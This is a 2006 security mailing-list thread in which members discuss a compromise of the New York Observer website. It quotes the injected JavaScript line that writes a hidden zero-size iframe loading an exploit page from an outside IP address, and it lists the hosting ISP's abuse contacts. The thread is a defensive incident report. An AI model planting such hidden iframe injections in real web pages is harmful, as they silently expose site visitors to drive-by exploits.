[Dshield] New York Newspaper hacked

ptds@majordomo.thedacare.org ptds at majordomo.thedacare.org
Mon Feb 27 02:57:03 GMT 2006


On Sun, 26 Feb 2006, Tom wrote:

> At 8:37 AM -0600 2/26/06, ptds at majordomo.thedacare.org wrote:
> >Anyone know a human at the observer in New York?
> >
> >Someone has put an iframe exploit into the code inserted on each page.
> >
> >Don't go here:
> >
> >http://
> >www.observer.com/ 20060227 / 20060227_Joe_Conason_opinions_conason.asp
> 
> All I see are iframes being used for ads as seen below. 
> advertserve.com seems like a totally legit biz and I pulled some ads 
> ant them are legit also. What made you think this is an exploit?

The iframe is inserted on every page, lives here,
www.observer.com// includes/ nyo.js

 and reads 
document.write('<iframe height=0 width=0 
src="http:// 210.118.120.49/ HitCount/ Top.Htm"></iframe>'

It seems its was inserted last Sunday.

This, when retrieved, is an mht exploit.

The less daring can see a jpg of its effect here
http://rrcs-24-106-25-102.west.biz.rr.com/exploit.jpg

210.118.120.49 these guys don't answer their abuse email:
[ ISP IPv4 Admin Contact Information ]
Name               : IPAdministrator
Phone              : +82-2-509-0534
E-Mail             : snnoc at samsung.com

[ ISP IPv4 Tech Contact Information ]
Name               : IP Manager
Phone              : +82-2-509-0534
E-Mail             : snnoc at samsung.com

[ ISP Network Abuse Contact Information ]
Name               : NetworkAbuse
Phone              : +82-2-509-0534
E-Mail             : ipabuse at samsung.com

Paul



More information about the list mailing list